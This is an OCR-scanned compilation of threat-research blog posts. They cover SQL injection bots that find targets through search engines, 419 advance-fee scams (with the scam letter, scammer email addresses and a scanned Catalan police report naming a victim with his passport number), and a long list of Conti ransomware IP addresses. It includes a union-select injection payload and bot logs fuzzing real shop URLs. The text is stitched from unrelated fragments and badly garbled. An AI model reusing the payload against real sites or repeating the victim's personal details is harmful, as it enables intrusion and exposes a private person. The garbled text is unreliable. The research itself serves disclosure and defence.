Powered by a Team of marketing experts 
VR developers GUI experts and game 
production experts 


) Self-sufficient virtual and cyber-based 
token-based economy where you bring in 
the cash and cash out 


6 Custom self-branded liquid crypto- 
currency empowering millions of loyal 
international users 
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Happy blacklisting/cross-checking! 
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[4]Inside an Affiliate Soam Program for Pharmaceuticals 

[5]Love is a Psychedelic, Too 

[6]Pharmaceutical Soammers Targeting LinkedIn 

[7]Fast-Flux Spam and Scams Increasing 

[8]Storm Worm Hosting Pharmaceutical Scams 

[9]Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings 
[10]Incentives Model for Pharmaceutical Scams 
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5.4.10 Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
(2009-04-29 14:32) 
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From the lone Chinese [1]SQL injectors empowered with [2]point’n’click tools for massive SQL 
injection attacks, to the much more efficient and automated botnet approach courtesy of 
the, for instance, [3]ASProx botnet the process of [4Jautomatically fetching URLs from public 
search engines in order to build hit lists for verifying against remote file inclusion attacks and 
potential SQL injections, remains a commodity feature in a great number of newly released 
malware bots. 
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> tschema http://www. | /shop .php?catid=O+union+tselect+1 ,nullarea,3 


< 

< {BoT]> [+] Table :]: Column :]: Database 

< {pot ]> [t] CHARACTER_SETS :]: DEFAULT_COLLATE_NAME =]: information_schena 
< [BOT ]> [*] CHARACTER_SETS :|: DESCRIPTION :|: information_schema 

< {poT]}> [t] CHARACTER_SETS :]: MAXLEN :|: information_schena 

< {poT]> [t] COLLATIONS tJ]: COLLATION_NAME =|: information_schema 

<  [BoT}> [?] COLLATIONS :]: CHARACTER SET_NANE =|: information schena 

< {pot ]}> [t] COLLATIONS :]: ID :]: information_schena 

< [BoT]}> [?] COLLATIONS :]: IS_DEFAULT :|: information_schena 

< {BoT]> [t] COLLATIONS =]: IS_COMPILED :]: information_schena 

< {poT]> [t] COLLATIONS :]: SORTLEN :]: information_schena 

< [BOT ]> [?] COLLATION_CHARACTER_SET_APPLICABILITY th: COLLATION_NANE =|: information_schenma 
< {poT]> {t] COLLATION CHARACTER SET APPLICABILITY :]: CHARACTER _SET_NANE =]: information schema 
< {pot ]> [t] COLUMNS =|: TABLE_CATALOG :|: information_schena 

< {BoT]> [?] COLUMNS =]: TABLE SCHEMA :|: information schema 

< {pot }> (t] COLUMNS =|: TABLE_NAME =]: information_schena 

< [BoT]> [?] COLUMNS :]: COLUMN_NANE =]: information_schena 

< [BOT ]> [?] COLUMNS =]: ORDINAL_POSITION <=]: information_schena 

< {pot ]> (t] COLUMNS =]: COLUMN DEFAULT =|: information _schena 

< [BoT]> [*] COLUMNS :]: IS_NULLABLE :]: information_schena 

< {BoT]}> [t] COLUMNS =]: DATA_TYPE :]: information_schena 

< {pot ]> [t] COLUMNS =]: CHARACTER_MAXINUM_LENGTH :|: information_schema 

< [BoT]> [t] COLUMNS =|: CHARACTER_OCTET_LENGTH :|: information_schenma 

< {BoT]> (t] COLUMNS =|: NUMERIC_PRECISION :|: information schema 

< {pot ]> [t] COLUMNS =]: NUMERIC SCALE :|: information_schena 

é fonTris fel oni iteic -f- CUADAPTCD CET MAME -1+ infaemsatian eehams 


In 2004, the [5]Santy worm advertised the feature to the not so efficiently centered hordes 
of script kiddies back then. Due to its simplicity, but huge potential for abuse, the concept 
of SQL injections through search engines reconnaissance has not only reached a real-time 
syndication with the latest remotely exploitable web application vulnerabilities, but has also 
converged with [6]remote file inclusion checks, local file inclusion checks, and ip2geolocation 
to unethically pen-test a particular country going beyond its designated domain extension. 


A recently released malware bot is once again empowering the average script kiddie with 
the possibility to take advantage of the window of opportunity for each and every remotely 
exploitable web application flaw featured at Milworm, based on its real-time syndication of 
the exploits. Moreover, the IRC based bot is also featuring a console which allows manual 
exploitation or intelligence gathering for a particular site. 
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YT ““L_BOTJ> ~~ —CO&L J: ~ Possible MySQL Vulnerable Website -> hi :://cht ilat- -monde 
A) [BoT ]> [*] Trying To Fuzz http://www... tfo sear. m/shojy ihp?c id=8&s 
A) [Bot ]> [*] Trying To Fuzz http://supp: sho 1/st :.php?« ‘id=3 

A) [BoT]> [t] Trying To Fuzz http://www.! jst de, ‘/prodt ‘s/sh_ .php?c 
A) [BoT]> [*] Trying To Fuzz http://www.) sit .ca, iop.phy :atid &prodi 
A) [BoT]> [*] Trying To Fuzz http://www.: aja  o.ut chop.pl ‘cati 21 

a [Bot ]> [*] Possible MySQL Vulnerable ' sit > hi i://wwm lrumj  .co.uk 
4) [BOT ]> [*] Trying To Fuzz http://www.l 2st s.ce ‘shop.j :?Cat =151 

A) [Bot ]> [¢] Trying To Fuzz http://www... sok om/s ip.php’ itid= teact= 
i) [BoT]> [t] Trying To Fuzz http://www.: the tme., m/shoy ihp?c id=268 
A) [BoT]> [t] Trying To Fuzz http://www.: 2t- nite ‘.com/s ip.ph catid= 
A) [BoT]> [t] Trying To Fuzz http://tosh ach «cor tain/ht ‘/sho php?ca 
A) [Bot ]> [*] Trying To Fuzz http://www.l isi ter. ‘.uk/sl i.php atID=4 
4) [BOT ]> [*] Trying To Fuzz http://www... erf h.ce au/sht php? tiDd=82 
(I [BoT]> [] Trying To Fuzz http://styl: ses n.ce ‘shop.j i?cat =12 

A) [BoT]> [*] Trying To Fuzz http://www. scp uk, \op.phy ‘atID 

A) [BoT]> [t] Trying To Fuzz http://www.: te. shop shp?cai |=14&% =3269 
a [BoT]> [*] Trying To Fuzz http://shop: iar -hel chop.pl ‘cati 28 

4) [BOT ]> [*] Possible MySQL Vulnerable ' sit > hi i://sht jigha or.net 
a [BoT]> [t] Trying To Fuzz http://www.: ssa -de, iop/sht php? tid=38 
4) [BoTt]> [*] Trying To Fuzz http://www.! <in it.c Wshop ip?ca d=6 

a [BoT]> [t] Possible MySQL Vulnerable ' sit > hi i://wwm iopki onit.c 


Some of the features include: 

- Remote file inclusion 

- Local file inclusion checks () 

- MySQL database details 

- Extract all database names 

- Data dumping from column and table 

- Notification issued when Google bans the infected host for automatically using it 


The commoditization of these features results in a situation where the window of oppor- 
tunity for abusing a partcular web application flaw is abused much more efficiently due to the 
fact that reconnaissance data about its potential exploitability is already crawled by a public 
search engine - often in real time. 


The concept, as well as the features within the bot are not rocket science - that’s what 
makes it so easy to use. 


Related posts: 

[7]Massive SQL Injection Attacks - the Chinese Way 

[8]Yet Another Massive SQL Injection Spotted in the Wild 

[9]Obfuscating Fast-fluxed SQL Injected Domains 

[10]Smells Like a Copycat SQL Injection In the Wild 

[11]SQL Injecting Malicious Doorways to Serve Malware 

[12]SQL Injection Through Search Engines Reconnaissance 

[13]Stealing Sensitive Databases Online - the SQL Style 

[14]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
[15]Sony PlayStation’s site SQL injected, redirecting to rogue security software 
[16]Redmond Magazine Successfully SQL Injected by Chinese Hacktivists 


1. http: //ddanchev. blogspot .com/2007/05/google-hacking-for-vulnerabilities.htm 


2. http: //ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


3. http://blogs.zdnet.com/security/?p=1122 
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This page was sent to you by: douglas 999@live fr 


Message from sender: 

From: Mr. Douglas Green The Manager Accounting and Operations Unit, HSBC 
Private Bank (UK) Limited, United Kingdom. Dear Friend, | am Mr. Douglas Green, 
The Manager of Accounting and Operations Unit, (HSBC Private Bank (UK) 
Limited).Based on the bank high sensitiveness and security i have decided to contact 
you outside the bank's sever IP for a beneficial transaction.| have an account here in 
my unit that is amounted at Four Million Two Hundred Thousand British Pounds 
Sterling which belongs to one of our customer’S from the United States of America 
who died long ago in a heart related decease. No one has come for the funds as the 
deceased was residing permanently here in the United Kingdom.The- bank will be 
transferring the funds Into the Bank treasury as an unclaimed fund by the end of this 
year as stipulated by the banking law over such account that lingers dormant for more 
than five years.| want to hearing from you so that | can file an application of claim in 
your name with the informations of the deceased and the account as the benefited 
beneficiary of the account-Please this is suppose d to take us only few bank working 
days to conclude on the transfer for | have put everything in place before contacting 
you and there is no risk. Thanks Yours sincerely Mr. Douglas Green 


OPINION | Apmil 21, 2009 

Op-Ed Columnist: Big-Spending Conservative 

By DAVID BROOKS 

President Obama is arguing for his activist agenda as a defense of middle-class morality and 
is positioning Democrats as the party of order and small-town values. This should make 
Republicans nervous. 
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In times when more and more [1]scammers/spammers are getting [2]Domainkeys verified, 
others are finding adaptive ways to increase the probability of bypassing antispam filters. 


Take for instance this 419s scam artist, that’s been pretty active in his scamming at- 
tempts as of recently. 


Generalitat de Catalunya és copia 
Se Departament dintenor 
Relacions Institucionals i Participacié 
Direccié General de la Policia 


Diligéncies numero: 289503/2009 AT USCPRATLL 
Horaidsta: 06:18 hores dol dia 18 d’abril de 2009 


Instructoria: Mosso del cos de Mossos d'Esquadra, amb TIP 13706 
Secretari/aria: Mosso del cos de Mossos d’Esquadra, amb TIP 


13573 


COMPAREIXENGA $A Prat de Liobregat, a les 06:18 hores del dia 
18 d’abril de 2009, i davant d'aquesta instruccio 

COMPAREIX 

Qui acredita ser Karunanitih PONNAN nascut el dia 12 de mar¢ de 
1957 a INDIA (india), fill de Ponnan i de Mariyayee, amb Passaport 
(india) nimero E9164679; amb domicili a IRUMBULIYUE, nom. 59 
KURINJI nagar (india) i teléfon 91 44 223981 16 


MANIFESTA 
_Que el Sr. PONNAN se presenta en esta instruccién para denuncur 
los siguientes hechos: 
Que ei Sr. PONNAN trabaja como lipulacién de barco 
Que se encontraba en el aeropuerto de el Prat de Lilobregat en 
Barcelona para coger un vuelo de regreso a su pais, India 
‘Que sobre las 05:45 horas de! dia de hoy se encontraba en la 
terminal B, frente a BRITISH AIRWAYS comprovando la hora de 
salida de su vuelo 
Que en ese momento alguien se ha hacercado por detras y le ha 
cogido la maleta en la que tenia suspertenencias. 
Que no ha podido ver a la persona que le ha cogido la mateta 
_Que $6 trataba de una maleta de color negro de marca JEEP. 
Que en su interior tenia 
- un (1) ordenador portatil marca HP valorado en 750 dolares 
- un (1) Cd para ordenador con un software especifico para el barco 
donde trabaja. 
- cuatro mil quinientos (4500) dolares en efectivo. 
- documentacién varia relativa al barco donde trabaja, tipo contrato 
acreditacién para trabajar en otros barcos, etc 
Que ha sido informado de los derechos que le son propios 
mediante acta independiente 
Que no tienen nada mas a decir i firman esta comparecencia en 
| ; ‘ prueva de conformidad las personas que han intervenido, a las 
isb=_e 06:40 hores de! dia 18 d’abril de 2009 
EZ Perqué consti ho certifico. 


Basically, he’s exploiting the fact that he’s allowed to enter a message within NYTimes.com’s 
Email this feature, whereas it will successfully reach the potential victim based on clean 
IP reputation of NYTimes - and sadly, he’s right since he’s already sending scam messages 
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18.5 May 


18.5.1 Courtesy of Republic of Bulgaria! - Part Six (2022-05-27 04:56) 


The rise of the savages. 


18.6 June 


18.6.1 How to Take Down the Conti Ransomware Gang - A Practical And Relevant 
Case Study on Taking Down Cybercriminal Infrastructure - A Practical Exam- 
ple (2022-06-14 14:07) 


I’ve recently took the time and effort to obtain access to and data mine the recently leaked 
Conti ransomware gang internal communication looking for loCs (Indicators of Compromise) 
including relevant OSINT artifacts which lead me to custom-tailored fashion brands courtesy of 
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through the following accounts registered at the site: 


douglas 999@live.fr 
douglas77@live.fr 
mamadou _sanou@live.fr 
markkaboreO@yahoo.fr 
abdelk11@hotmail.fr 
sulem musag@live.fr 
davidbchirot@hotmail.com 


Generalitat de Catalunya 


Departament dinterior, 

Relacions Insttucionals i Participacio Numero de diligencies 

Direccio General de Ia Policia 289503/2009 AT USCPRATLL 
FULL 1 de 1 


N 02 Acta d'informacio de drets a la persona perjudicada 
Dades cc la unitat instructora 


Cormissana Unitat gobcial 
USC EL PRAT DE LLOBREGAT Prat de Uiobregal 
Dades de fa porsona perjudicada 


Nom. cognoms | document Cidenttat (sous, pas | wr" 
Karununah PONNAN am Passaport {incia) ndemero EO104679 


Informacié de drets 
Us notifiquem ets vostres drets com a persons perjudicada per un presumpto 
delicte, d'acord amb Farticile 119 de la Constitucid espanyols i els arlicies 109. 
1101 771 de la Lie! Cergudiciament criminal: 

-Teniu dret 2 lassisiéncia juridica gratuita en ets termes que estabieix fa Lisi 
1/1996, de 10 de gener, dassistencia juridica gratuite 

-Teniu dret a compardiner com a part on e! proces judicial 

-Tenu dret a reciamar ta restitucid de la cosa, reparacié dels danys 0 ls 
indemnitzacié pels perjudios Que ol delicte us hag! causal 

-Tenu dret a renunciar-te a no reciamar is restitucd de la cosa, Ia roparack dels 
danys 0 la indemnitzacio pels pejudicis que el delicte us hagi causat 

-Teniu dret a designar un advocat perqué defensi els vosires interessos. Encara 
que no en designev. el Minister! Fiscal exercira les accions civils corresponents, 


si aind fos procedent 


Oferiment d’accions en les faltes cimprudéncia | deticte imprudent de danys 

Si heu estat la victima c'uns fets que constituien una falta dimprudénca Wo un 

delicte imprudent de danys, heu ce denunour aquests davant de fautoritat judicial 
spectvament, perque els Mossos 

dEsquadra /PL puguem emprencre acaons per perseguir els presumptes aulors 

dels fets. Si no ho feu, només podreu reclamar els pequdicis que aquests fets us 

hagin ocasionat mitjangant un judi! oral de naturales civil. 

x Autonitzo él Departament d'interior de la Generalitat de Catalunya a posar-se en 


contacte amb mi amb motiu de rEnquesta de Seguretat Publica de Calalunya- 


Dades de la notificacio 
Localitat (Comarca) 
Prat de Liobregat(Baix Liobregat) 


Hora i data 
06:42 hares Gel cia 18 Pabeil de 2009 


Signatures 
Sarees perjudicada coneix ets seus Grets | per aixd signa aquesta acta | soin queda 
una copa 
Persona perjudicads Agent que ta la notficacd 
t 
a A 
\ + 
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some of the gang members including several "in the works" re-branded upcoming ransomware 
as a service brand names including but let’s not forget to access to actual MD5’s, C &C server 
locations including a vast portfolio of IPS managed and operated by the Conti ransomware gang 
which I'll expose in this post potentially undermining the Internet-connected infrastructure of 
one of the Web’s primary and most popular ransomware brands potentially assisting U.S Law 
Enforcement on its way to track down and monitor the cybercriminals behind these campaigns. 


Sample screenshots and infographics indicating the current state of the Internet-connected 
infrastructure of the Conti ransomware gang: 


[1] 
Host distribution by ISP 


/ 
i 


SpectralP B.V 


[2] 


Host distribution by country 


se} Bulgaria 


\- Switzerland 


\- Estonia 
“ Netherlands 


[3] 
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[4] 


22124 


[9] 


[10] 
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Sample IPs obtained and data mined from the recently leaked and publicly accessible Conti 
ransomware gang internal communication which I'll attempt to take offline in this post 


include: 
hxxp://63.141.224.42 
hxxp://3.128.1.29 
hxxp://216.244.83.226 


hxxp://216.144.236.212 


hxxp://185.25.51.99 
hxxp://88.119.175.97 
hxxp://62.75.216.38 
hxxp://88.119.175.222 
hxxp://217.172.179.14 
hxxp://3.128.1.1 
hxxp://3.128.222.222 
hxxp://185.244.149.47 
hxxp://188.227.59.21 
hxxp://93.189.42.83 
hxxp://62.113.119.119 
hxxp://46.4.167.227 
hxxp://36.68.95.228 
hxxp://182.253.123.52 
hxxp://36.69.136.238 
hxxp://125.165.227.51 
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hxxp://182.253.88.153 
hxxp://36.79.218.135 
hxxp://117.254.62.253 
hxxp://117.212.94.124 
hxxp://125.163.175.91 
hxxp://185.25.51.2 
hxxp://185.212.47.173 
hxxp://185.25.48.166 
hxxp://173.232.146.199 
hxxp://173.232.146.72 
hxxp://66.42.113.88 
hxxp://194.76.224.61 
hxxp://79.143.31.167 
hxxp://91.235.129.241 
hxxp://36.73.152.96 
hxxp://36.73.152.146 
hxxp://125.164.24.116 
hxxp://125.164.152.29 
hxxp://177.76.218.32 
hxxp://46.249.32.111 
hxxp://173.232.146.224 
hxxp://88.119.175.58 
hxxp://194.36.188.92 
hxxp://185.172.129.178 
hxxp://81.177.141.219 
hxxp://186.216.125.178 
hxxp://45.235.6.161 
hxxp://189.126.77.143 
hxxp://189.126.77.158 
hxxp://191.37.212.123 
hxxp://179.211.238.56 
hxxp://185.14.31.137 
hxxp://162.244.81.57 
hxxp://88.119.174.211 
hxxp://89.32.41.184 
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hxxp://192.99.255.32 
hxxp://185.99.2.221 
hxxp://134.119.191.38 
hxxp://173.232.146.236 
hxxp://64.56.74.56 
hxxp://46.249.62.234 
hxxp://212.129.41.246 
hxxp://173.232.146.12 
hxxp://185.82.126.178 
hxxp://192.3.247.112 
hxxp://185.198.57.88 
hxxp://185.82.126.126 
hxxp://158.69.133.78 
hxxp://213.252.247.162 
hxxp://148.251.99.95 
hxxp://185.14.31.44 
hxxp://185.99.2.238 
hxxp://134.119.191.43 
hxxp://194.156.98.38 
hxxp://82.146.36.156 
hxxp://79.141.167.25 
hxxp://162.244.81.87 
hxxp://5.1.81.68 
hxxp://185.164.32.148 
hxxp://34.222.222.126 
hxxp://23.95.97.59 
hxxp://179.43.147.243 
hxxp://88.119.175.76 
hxxp://185.158.248.251 
hxxp://185.25.51.139 
hxxp://185.82.126.142 
hxxp://185.189.149.148 
hxxp://162.223.91.111 
hxxp://162.223.91.5 
hxxp://144.91.79.6 
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hxxp://82.148.16.92 
hxxp://51.89.125.28 
hxxp://173.232.146.91 
hxxp://195.123.238.28 
hxxp://177.92.89.225 
hxxp://45.231.243.254 
hxxp://45.175.125.157 
hxxp://138.36.199.158 
hxxp://187.85.6.15 
hxxp://191.254.117.196 
hxxp://191.37.213.118 
hxxp://45.235.149.112 
hxxp://148.72.149.119 
hxxp://195.123.241.44 
hxxp://93.189.41.213 
hxxp://185.68.93.72 
hxxp://117.196.234.254 
hxxp://117.222.62.251 
hxxp://45.251.43.152 
hxxp://117.212.195.197 
hxxp://134.119.191.22 
hxxp://194.87.145.86 
hxxp://8.8.8.8 
hxxp://217.12.218.199 
hxxp://91.235.129.41 
hxxp://185.25.48.85 
hxxp://156.96.156.31 
hxxp://89.191.234.53 
hxxp://176.119.159.213 
hxxp://5.188.133.193 
hxxp://189.126.76.249 
hxxp://179.127.85.8 
hxxp://177.19.41.192 
hxxp://177.96.87.31 
hxxp://177.76.222.137 
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His excuse for using NYTimes.com? - "Based on the bank high sensitiveness and security i 
have decided to contact you outside the bank’s sever IP for a beneficial transaction." 


Another scam that I’ve been tracking for a while is using a new "Hand bag stolen at 
Barcelona air port" social engineering attempt, and is attaching scanned copies of real 
baggage loss documents in order to improve the truthfulness of the scam. Pretty catchy if you 


don’t know what [3]advance fee fraud is. 


1. http: //ddanchev. blogspot .com/2008/09/spam- campaign-abusing-yahoos-services.htm 


2. http: //ddanchev. blogspot .com/2008/09/hi jacking-spam-campaigns-click-through. htm 


3. http://en.wikipedia.org/wiki/Advance_fee_fraud 


5.5 May 


5.5.1 Summarizing Zero Day’s Posts for April (2009-05-01 10:05) 


BNET TECHREPUBLIK ZDNET 


ZoNet 


News & Blogs Videos White Papers 


Ryan Naraine and Dancho Danchev 


. 


a 


> Mat a 5 
Pick a blog category A 


April 30th, 2000 
French hacker gains access to 
Twitter's admin panel 


Categories: 
Tage ace 
abiatakbak -2 S&S ww © P> +3 
UPDATE: The Twitter admin hack appears to be 
_ the result of a successful social engineering 
. WJ é G < ji attack against one of Twitter's employees — 
umilar attack took place in January this year 
Here’s aretrospective of the events that took 
place 


Yesterday, a French hacker daimed to have gained access to Twitter's 
odminésty ation panel, and based on the screen shots that he mouded featuring 
interna! deta for accounts belonging to U.S President Barack Obama, Gritney 
Speers, Astton Kutcher, and Lily Alien, as well as 4 detailed overview of 


Downloads 


Pretty Wicked 


Search a 


Reviews Popular 


Essential Topics EMC 
©) what size is 


© Boost st age Utization via data 
de-duplication 


your data footprint? 


© See how multiple file versions enpact 
data quality 


© Your choice: Immediate or deferred 
de-duping 


REMOTE 
MANAGEMENT 


introducing 


Paragent Appliances 


=_ 


Girts 


confess wickedness 


mHOT 
Spo 


Smartphones 


Last yeer, many 
businesses deferred 
the purchase of new 
laptops in favor of 
smartphones, and 
why not? Offering 
phone, calendar 
email, IM and Web 
eccess, they're 
arguably the most 
Practical Dusiness 
tools, Check out the 
latest ONET Re wees 
of Blackberry 
Gevices for all the 
knowledge you 
need to make an 
intelbgent choice 


Designed for 
bold living. 


The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for April. You 
can also go through previous summaries for [2]March, [3]February, [4]January, [5]December, 
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hxxp://177.134.244.53 
hxxp://51.77.112.254 
hxxp://185.99.2.191 
hxxp://185.25.48.19 
hxxp://98.195.11.49 
hxxp://24.196.61.74 
hxxp://71.174.248.248 
hxxp://89.238.224.226 
hxxp://146.112.43.85 
hxxp://65.186.2.65 


hxxp://188.213.139.117 


hxxp://192.214.98.81 
hxxp://157.185.84.186 
hxxp://198.233.175.66 
hxxp://12.31.238.42 
hxxp://217.12.218.196 
hxxp://72.12.194.92 
hxxp://42.246.46.32 
hxxp://38.132.113.62 
hxxp://38.132.96.56 
hxxp://38.132.96.61 
hxxp://84.17.52.77 
hxxp://162.244.32.145 
hxxp://62.113.114.91 
hxxp://45.67.231.167 
hxxp://117.222.62.141 
hxxp://117.212.195.24 
hxxp://177.46.194.154 
hxxp://187.65.49.148 
hxxp://187.65.49.157 
hxxp://46.28.69.11 
hxxp://158.69.133.74 
hxxp://45.11.183.78 
hxxp://88.119.174.228 
hxxp://194.36.191.13 
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hxxp://51.89.241.81 
hxxp://185.82.126.49 
hxxp://198.46.198.111 
hxxp://51.81.112.137 
hxxp://185.141.63.159 
hxxp://51.81.112.144 
hxxp://156.96.46.27 
hxxp://185.189.151.142 
hxxp://199.217.119.222 
hxxp://148.251.27.244 
hxxp://51.89.125.117 
hxxp://51.89.125.122 
hxxp://194.5.249.13 
hxxp://98.221.5.74 
hxxp://185.14.31.135 
hxxp://162.244.81.159 
hxxp://172.18.9.22 
hxxp://192.99.211.47 
hxxp://173.232.146.93 
hxxp://198.46.198.129 
hxxp://185.244.151.133 
hxxp://173.232.146.29 
hxxp://194.36.191.164 
hxxp://185.99.2.49 
hxxp://216.244.85.15 
hxxp://23.148.144.242 
hxxp://156.96.59.27 
hxxp://194.31.141.134 
hxxp://156.96.118.48 
hxxp://156.96.59.26 
hxxp://185.181.229.146 
hxxp://156.96.113.99 
hxxp://12.91.243.78 
hxxp://137.26.64.78 
hxxp://66.222.113.245 
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hxxp://67.221.143.83 
hxxp://69.243.37.254 
hxxp://71.49.134.187 
hxxp://98.152.199.222 
hxxp://174.244.192.244 
hxxp://172.58.7.33 
hxxp://96.77.226.65 
hxxp://174.198.16.113 
hxxp://216.59.112.226 
hxxp://66.189.183.14 
hxxp://68.74.132.63 
hxxp://73.63.223.199 
hxxp://174.194.136.122 
hxxp://69.3.129.242 
hxxp://73.132.17.148 
hxxp://63.157.5.162 
hxxp://174.242.147.172 
hxxp://73.84.127.221 
hxxp://216.194.176.129 
hxxp://173.66.249.216 
hxxp://67.197.55.33 
hxxp://96.79.67.178 
hxxp://69.244.229.112 
hxxp://173.79.159.16 
hxxp://37.228.117.87 
hxxp://185.25.48.244 
hxxp://88.119.174.219 
hxxp://45.11.183.18 
hxxp://45.78.132.242 
hxxp://46.249.32.139 
hxxp://51.38.118.153 
hxxp://91.235.129.151 
hxxp://82.118.16.219 
hxxp://194.5.249.163 
hxxp://194.5.249.164 
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hxxp://173.232.146.11 
hxxp://156.96.156.221 
hxxp://185.117.73.164 
hxxp://217.12.219.118 
hxxp://95.171.16.42 
hxxp://185.99.2.65 
hxxp://134.119.191.11 
hxxp://185.99.2.66 
hxxp://192.3.247.123 
hxxp://134.119.191.21 
hxxp://181.112.157.42 
hxxp://181.129.134.18 
hxxp://45.6.16.68 
hxxp://36.89.182.225 
hxxp://36.89.243.241 
hxxp://182.253.113.67 
hxxp://36.66.218.117 
hxxp://45.11.183.152 
hxxp://35.191.255.255 
hxxp://173.232.146.63 
hxxp://134.19.189.196 
hxxp://185.172.129.62 
hxxp://185.142.99.25 
hxxp://192.3.247.116 
hxxp://84.17.61.67 
hxxp://195.123.241.12 
hxxp://198.46.198.128 
hxxp://195.123.242.71 
hxxp://51.89.177.15 
hxxp://23.92.93.234 
hxxp://194.5.249.17 
hxxp://195.123.242.84 
hxxp://51.89.163.32 
hxxp://23.92.93.236 
hxxp://198.46.198.131 
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hxxp://195.123.242.99 
hxxp://194.5.249.174 

hxxp://185.164.32.214 
hxxp://198.46.198.139 


hxxp://195.123.241.187 


hxxp://185.234.72.77 
hxxp://51.89.177.31 
hxxp://194.5.249.175 
hxxp://185.164.32.215 
hxxp://198.46.198.133 
hxxp://195.123.241.94 
hxxp://51.89.177.7 
hxxp://23.92.93.237 
hxxp://194.5.249.185 
hxxp://195.123.242.57 
hxxp://198.46.198.13 
hxxp://195.123.242.72 
hxxp://51.89.177.8 
hxxp://194.5.249.186 
hxxp://149.28.43.215 
hxxp://51.81.112.171 
hxxp://185.141.63.38 
hxxp://195.123.222.2 
hxxp://217.12.218.28 
hxxp://64.173.224.7 
hxxp://118.69.221.114 
hxxp://91.132.139.153 
hxxp://37.252.13.245 
hxxp://5.61.61.169 
hxxp://89.249.65.229 
hxxp://37.252.8.182 
hxxp://84.247.51.126 
hxxp://188.116.27.84 
hxxp://37.252.8.193 
hxxp://37.252.8.186 


22137 


hxxp://37.252.8.161 
hxxp://37.252.8.187 
hxxp://37.252.9.154 
hxxp://185.156.173.99 
hxxp://185.244.213.34 
hxxp://185.86.148.63 
hxxp://185.183.99.149 
hxxp://51.75.181.36 
hxxp://192.169.6.82 
hxxp://23.94.233.253 
hxxp://213.87.146.113 
hxxp://185.82.127.4 
hxxp://185.244.149.48 
hxxp://125.125.125.125 
hxxp://51.89.177.9 
hxxp://194.5.249.193 
hxxp://64.44.133.137 
hxxp://194.5.249.194 
hxxp://185.164.32.216 
hxxp://195.123.247.34 
hxxp://64.44.133.61 
hxxp://194.5.249.197 
hxxp://195.123.221.49 
hxxp://185.164.32.219 
hxxp://185.244.39.251 
hxxp://195.123.241.63 
hxxp://194.5.249.198 
hxxp://185.164.32.218 
hxxp://167.86.123.175 
hxxp://195.123.241.68 
hxxp://195.123.242.83 
hxxp://179.43.147.234 
hxxp://185.17.121.162 
hxxp://173.232.146.226 
hxxp://5.61.33.195 
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hxxp://5.61.32.173 
hxxp://91.132.139.218 
hxxp://37.252.9.69 
hxxp://89.44.9.148 
hxxp://89.38.225.228 
hxxp://195.123.237.241 
hxxp://5.182.211.125 
hxxp://195.123.241.224 
hxxp://185.99.2.116 
hxxp://5.182.211.124 
hxxp://195.123.241.229 
hxxp://185.234.72.114 
hxxp://194.5.249.214 
hxxp://185.99.2.115 
hxxp://51.89.215.186 
hxxp://194.5.249.215 
hxxp://195.123.242.119 
hxxp://185.99.2.118 
hxxp://5.182.211.138 
hxxp://51.77.112.252 
hxxp://194.5.249.225 
hxxp://195.123.241.59 
hxxp://51.77.112.253 
hxxp://194.5.249.226 
hxxp://185.99.2.128 
hxxp://195.123.241.58 
hxxp://88.119.175.234 
hxxp://194.76.226.98 
hxxp://95.171.15.71 
hxxp://46.249.32.16 
hxxp://46.249.62.195 
hxxp://195.123.241.175 
hxxp://51.89.215.189 
hxxp://195.123.241.124 
hxxp://194.5.249.229 
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hxxp://195.123.241.92 
hxxp://185.99.2.239 
hxxp://192.3.247.11 
hxxp://192.3.247.115 
hxxp://85.143.221.85 
hxxp://82.146.37.128 
hxxp://187.35.237.51 
hxxp://189.126.78.19 
hxxp://131.255.169.48 
hxxp://191.37.213.79 
hxxp://143.255.7.233 
hxxp://177.46.197.82 
hxxp://45.186.96.249 
hxxp://95.181.155.77 
hxxp://45.138.158.41 
hxxp://194.5.249.221 
hxxp://195.123.241.134 
hxxp://51.89.177.11 
hxxp://195.123.212.211 
hxxp://134.19.189.187 
hxxp://188.68.221.214 
hxxp://193.238.153.7 
hxxp://88.119.175.123 
hxxp://185.68.93.8 
hxxp://185.66.12.218 
hxxp://195.123.237.95 
hxxp://185.43.5.79 
hxxp://185.43.6.59 
hxxp://36.72.89.95 
hxxp://125.167.144.34 
hxxp://182.253.174.93 
hxxp://124.158.172.28 
hxxp://138.97.93.125 
hxxp://117.252.65.13 
hxxp://117.252.65.27 
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hxxp://117.212.194.48 
hxxp://69.197.132.42 
hxxp://38.122.185.171 
hxxp://12.215.19.98 
hxxp://164.132.76.76 
hxxp://194.156.98.46 
hxxp://188.225.9.82 
hxxp://85.143.221.6 
hxxp://185.234.72.35 
hxxp://51.77.112.255 
hxxp://194.5.249.246 
hxxp://185.99.2.244 
hxxp://5.182.211.222 
hxxp://45.89.125.148 
hxxp://185.99.2.243 
hxxp://5.182.211.223 
hxxp://194.5.249.247 
hxxp://185.234.72.94 
hxxp://51.89.163.33 
hxxp://194.5.249.248 
hxxp://195.123.241.136 
hxxp://185.99.2.179 
hxxp://5.182.211.25 
hxxp://195.123.241.49 
hxxp://185.234.72.155 
hxxp://194.5.249.143 
hxxp://195.123.241.241 
hxxp://185.99.2.83 
hxxp://134.255.254.194 
hxxp://194.5.249.142 
hxxp://195.123.241.242 
hxxp://185.99.2.184 
hxxp://185.142.99.32 
hxxp://164.132.255.233 
hxxp://93.189.46.41 
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hxxp://81.177.139.38 
hxxp://37.252.11.147 
hxxp://5.61.36.89 
hxxp://96.36.51.115 
hxxp://89.38.225.171 
hxxp://37.252.8.144 
hxxp://37.252.5.58 
hxxp://45.89.175.135 
hxxp://8.17.112.7 
hxxp://45.153.185.81 
hxxp://194.156.98.172 
hxxp://188.227.59.174 
hxxp://195.2.93.227 
hxxp://185.66.13.126 
hxxp://54.37.237.253 
hxxp://186.192.178.57 
hxxp://117.254.56.72 
hxxp://117.252.68.226 
hxxp://177.99.21.247 
hxxp://117.196.233.231 
hxxp://45.235.151.37 
hxxp://45.179.112.52 
hxxp://45.179.112.89 
hxxp://117.252.64.225 
hxxp://117.242.37.213 
hxxp://71.173.79.26 
hxxp://195.123.241.194 
hxxp://217.12.218.29 
hxxp://173.234.155.124 
hxxp://5.9.178.75 
hxxp://45.138.158.53 
hxxp://179.43.158.187 
hxxp://185.183.98.14 
hxxp://164.132.76.175 


hxxp://117.196.229.213 
22142 


